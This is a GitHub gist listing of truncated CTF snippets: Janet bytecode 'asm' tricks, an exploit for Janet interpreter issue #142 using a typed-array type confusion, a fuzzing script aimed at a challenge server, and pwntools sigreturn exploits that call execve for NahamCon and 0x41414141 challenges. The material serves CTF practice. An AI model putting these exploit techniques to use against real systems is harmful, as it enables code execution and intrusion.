Navigation Menu

Skip to content

Instantly share code, notes, and snippets.

View lionaneesh's full-sized avatar
🎯
Focusing

Aneesh Dogra lionaneesh

🎯
Focusing
223 followers · 55 following
View GitHub Profile
@lionaneesh
lionaneesh / replme_remote_final.janet
Last active April 1, 2021 04:10
(def some
(asm
'{
constants @["blah" print]
:arity 0
slotcount 2
bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
}
))
@lionaneesh
lionaneesh / replme_janet_final.janet
Last active April 1, 2021 04:23
(def some
(asm
'{
constants @["blah" print]
:arity 0
slotcount 2
bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
}
))
@lionaneesh
lionaneesh / replme_janet_programbase.janet
Created April 1, 2021 03:44
(def some
(asm
'{
constants @["blah" print]
:arity 0
slotcount 2
bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
}
))
@lionaneesh
lionaneesh / replme_janet_leaks.janet
Last active April 1, 2021 03:22
(def some
(asm
'{
constants @["blah" print]
:arity 0
slotcount 2
bytecode @[(lds 0) (ldc 1 0) (push 1) (ldc 1 1) (mkarr 2) (ret 2)]
}
))
@lionaneesh
lionaneesh / janet_142.janet
Created April 1, 2021 03:14
Janet Issue #142 exploit
(def buffer (tarray/buffer 8))
(def buffer-float64-view (tarray/new :float64 1 1 0 buffer))
(def buffer-uint32-view (tarray/new :uint32 2 1 0 buffer))
(set (buffer-uint32-view 1) 0xfffe9234)
(set (buffer-uint32-view 0) 0x56789abc)
(print "object: " (buffer-float64-view 0))
(print " type: " (type (buffer-float64-view 0)))
@lionaneesh
lionaneesh / umassctf2021_replme_fuzz.py
Created April 1, 2021 02:41
Fuzzing script for replme all credits to downgrade.
import requests
url = "http://34.72.244.178:8085/"
proxy = {"http":"http://127.0.0.1:8080"}
results = {}
funcs = "% %= * *= + ++ += - -- -= -> ->> -?> -?>> / /= < <= = == > >= abstract? all all-bindings all-dynamics and apply array array/concat array/ensure array/insert array/new array/peek array/pop array/push array/remove array/slice array? as-> as?-> asm bad-compile bad-parse band blshift bnot boolean? bor brshift brushift buffer buffer/bit buffer/bit-clear buffer/bit-set buffer/bit-toggle buffer/blit buffer/clear buffer/format buffer/new buffer/new-filled buffer/popn buffer/push-byte buffer/push-string buffer/push-word buffer/slice buffer? bxor bytes? case cfunction? comment comp compile complement cond coro count debug debug/arg-stack debug/break debug/fbreak debug/lineage debug/stack debug/stacktrace debug/unbreak debug/unfbreak dec deep-not= deep= def- default defglobal defmacro defmacro- defn defn- describe dictionary? disasm distinct doc doc* doc-format dofile drop drop-until drop-while dyn each em
@lionaneesh
lionaneesh / janet_print_asm.janet
Last active April 1, 2021 02:20
Janet Print in asm
(def hello2
(asm
'{max-arity 0
constants @["abc" ,print]
arity 0
slotcount 2
bytecode @[(ldc 1 0) (push 1) (ldc 1 1) (noop) (tcall 1)]
min-arity 0}))
(hello2)
@lionaneesh
lionaneesh / solve-some-really-ordinary-program.py
Created March 16, 2021 13:49
Exploit for ./some-really-ordinary-program from NahamCon 2021
from pwn import *
p = process('./some-really-ordinary-program')
#p = remote("challenge.nahamcon.com", 32119)
data = 0x402000 + 0x1f4 # added 0x1f4 to avoid going out of bounds stack in main, note main does sub esp, 0x1f4
main = 0x401022
syscall_ret = 0x40101f
# frame to call execve
@lionaneesh
lionaneesh / solve_moving-signals.py
Last active March 15, 2021 11:07
Exploit for Moving Signals from 0x41414141 2021 ctf
from pwn import *
binary = ELF("./moving-signals")
pr = process("./moving-signals")
#pr = remote("161.97.176.150", 2525)
buff = 0x7ffd4ac736b0
pop_rax_ret = 0x0000000000041018
binshstr = 0x41250
syscall_ret = 0x41015
frame = SigreturnFrame(arch="amd64", kernel="amd64")
frame.rax = 59
@lionaneesh
lionaneesh / saas_final_solve.py
Created June 14, 2020 09:41
SaaS from NahamCon 2020
from pwn import *
r = remote('jh2i.com', 50016)
#r = process('./saas')
def syscall(a2):
print ("syscall", a2)
for a in a2:
txt = r.recv(timeout=2).strip()
print (txt.strip(), len(txt))
r.sendline(str(a))